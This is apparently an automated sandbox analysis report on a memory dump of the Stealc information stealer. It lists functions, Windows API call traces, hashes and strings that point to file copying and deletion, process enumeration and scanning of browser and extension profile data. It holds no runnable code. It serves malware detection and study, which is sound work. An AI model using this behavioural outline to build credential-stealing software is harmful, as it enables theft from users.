Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @Jni$Jni$Jni
API String ID: 544645111-3865682415
Opcode ID: e688c6828d9d186633bcac511b283a36e42e3cc390aebdc89463872a584b6541
Instruction ID: 7115210e3c70c4ffad361eeec9a324ec0d729f74f496b979282d019395426c0a
Opcode Fuzzy Hash: e688c6828d9d186633bcac511b283a36e42e3cc390aebdc89463872a584b6541
Instruction Fuzzy Hash: F3210774A00308EFCB04CF99C494BADBBB6FB48304F108199E589AB751D335AA81DF80

Function 0069A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006A8B60: GetSystemTime.KERNEL32(?,00A04790,006B05AE,?,?,?,?,?,?,?,?,?,00694963,?,00000014), ref: 006A8B86

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069A2E1
lstrlenA.KERNEL32(00000000,00000000), ref: 0069A3FF
lstrlenA.KERNEL32(00000000), ref: 0069A6BC

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 00699E10: memcmp.MSVCRT(?,v20,00000003), ref: 00699E2D

DeleteFileA.KERNEL32(00000000), ref: 0069A743

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: 9c61be10f09f83f9c5c9e6cf076e5c4011f86f55c863028b82232e8bde2d8307
Instruction ID: d58c2acfe870aac3873b1041955a6209c8c3903263c9bfe1c03d85b85b553c3b
Opcode Fuzzy Hash: 9c61be10f09f83f9c5c9e6cf076e5c4011f86f55c863028b82232e8bde2d8307
Instruction Fuzzy Hash: 4EE1C8728101089ADB88FBE4DC92EEE733AAF15300F50815EF51766091EF346E49CF6A

Function 0069D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006A8B60: GetSystemTime.KERNEL32(?,00A04790,006B05AE,?,?,?,?,?,?,?,?,?,00694963,?,00000014), ref: 006A8B86

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069D801
lstrlenA.KERNEL32(00000000), ref: 0069D99F
lstrlenA.KERNEL32(00000000), ref: 0069D9B3
DeleteFileA.KERNEL32(00000000), ref: 0069DA32

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: fc1c1cc1f6518a571639e7794c5058815cac0b93dfcbdb9ca8b603eb25c97fbe
Instruction ID: ec4fa0cc5a3bb6b965317fc3fc70457395b38941be1a3c294e1dde289388d8eb
Opcode Fuzzy Hash: fc1c1cc1f6518a571639e7794c5058815cac0b93dfcbdb9ca8b603eb25c97fbe
Instruction Fuzzy Hash: D181DD719111089ADB88FBE4DC56AEE737AAF15300F50452EF507A6091EF346E09CF66

Function 0069F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,006A02E7,00000000), ref: 00699A5A
Part of subcall function 006999C0: LocalFree.KERNEL32(006A02E7), ref: 00699A90
Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A

Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,006B1580,006B0D92), ref: 0069F54C
lstrlenA.KERNEL32(00000000), ref: 0069F56B

Strings

moz-extension+++, xrefs: 0069F5AD
^userContextId=4294967295, xrefs: 0069F59C

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: c954432fcf4059c9bee294c3dcd59072291af1a6c134e8f8473a724ed0d43318
Instruction ID: 5f3b18aece05161ed79a9a7ff01754eb591beace093e6c7736594320737fa8a8
Opcode Fuzzy Hash: c954432fcf4059c9bee294c3dcd59072291af1a6c134e8f8473a724ed0d43318
Instruction Fuzzy Hash: E0510F75D10108AADB84FBE0DC52DEE737AAF55300F50852DF816A6191EF34AE09CFA6

Function 006A8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006B05B7), ref: 006A86CA
Process32First.KERNEL32(?,00000128), ref: 006A86DE
Process32Next.KERNEL32(?,00000128), ref: 006A86F3

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

CloseHandle.KERNEL32(?), ref: 006A8761

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 87ace3e683fb5f395dc8dbc6ed66115d13dc958fe6cb25b5f7bd7a7dbd0ce127
Instruction ID: 24a69466e996a197aa41d53b5ac417e176338160f2eaf49d6b374c2d511fbf61
Opcode Fuzzy Hash: 87ace3e683fb5f395dc8dbc6ed66115d13dc958fe6cb25b5f7bd7a7dbd0ce127
Instruction Fuzzy Hash: E0314F71901218ABCBA4EF94CC45FEEB779FB46700F10429EE50AA2190DB346E45CFA1

Function 006A4F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 006A8E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 006A4F7A
lstrcatA.KERNEL32(?,006B1070), ref: 006A4F97
lstrcatA.KERNEL32(?,00A0D850), ref: 006A4FAB
lstrcatA.KERNEL32(?,006B1074), ref: 006A4FBD

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A492C
Part of subcall function 006A4910: FindFirstFileA.KERNEL32(?,?), ref: 006A4943

Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
Part of subcall function 006A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
Part of subcall function 006A4910: FindClose.KERNEL32(000000FF), ref: 006A4B92

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: c52f7c078499dd84e8d069664907d090937112d4850cb1b59de3206c49f32590
Instruction ID: ec403992bb3081ecc47b7592101c25b84e5a4b7b685681d10bd8dfd88f23388f
Opcode Fuzzy Hash: c52f7c078499dd84e8d069664907d090937112d4850cb1b59de3206c49f32590
Instruction Fuzzy Hash: 7D21D0B69002046BC794F7B0DC46EEE337DB755300F40465DB64557181DE749AC8CF96

Function 006A6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A01348,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006A6AE8
CloseHandle.KERNEL32(00000000), ref: 006A6AF9
Sleep.KERNEL32(00001770), ref: 006A6B04
CloseHandle.KERNEL32(?,00000000,?,00A01348,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6B1A
ExitProcess.KERNEL32 ref: 006A6B22

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 3a439edcd7520d091ec9201fe6871f7fd6a063d645ac1376d5dcfaf30b706a75
Instruction ID: 17288c1fb91ffb6f1e878413d2ae3e205b98e15a799610a71b85d5b5b67a2a0e
Opcode Fuzzy Hash: 3a439edcd7520d091ec9201fe6871f7fd6a063d645ac1376d5dcfaf30b706a75
Instruction Fuzzy Hash: 10F05E30A40209ABE740BBA0DD06BBE7BB5FB06701F24461ABA13A11C1DBB05D41DE6A

Function 00696D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

`oi, xrefs: 00696EAF, 00696DAE, 00696E5E, 00696E94, 00696DD2

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID:
String ID: `oi
API String ID: 0-1637727398
Opcode ID: 545430bf37b71e7750cc562204ded3e2c88e718d6d0dcc612fa064d358480ea6
Instruction ID: cc577314054a6271d57e149119b0af11aed22f175985d858bc9690c17f22a06f
Opcode Fuzzy Hash: 545430bf37b71e7750cc562204ded3e2c88e718d6d0dcc612fa064d358480ea6
Instruction Fuzzy Hash: 686113B4900218EBCF14CF94E984BEEB7BABB08304F108599F419A7780D775AE94DF91

Function 006A4BB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 006A8E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 006A4BEA
lstrcatA.KERNEL32(?,00A10C50), ref: 006A4C08

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A492C
Part of subcall function 006A4910: FindFirstFileA.KERNEL32(?,?), ref: 006A4943

Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
Part of subcall function 006A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
Part of subcall function 006A4910: FindClose.KERNEL32(000000FF), ref: 006A4B92

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A49B0
Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B08D2), ref: 006A49C5
Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A49E2
Part of subcall function 006A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 006A4A1E
Part of subcall function 006A4910: lstrcatA.KERNEL32(?,00A0D870,?,000003E8), ref: 006A4A4A
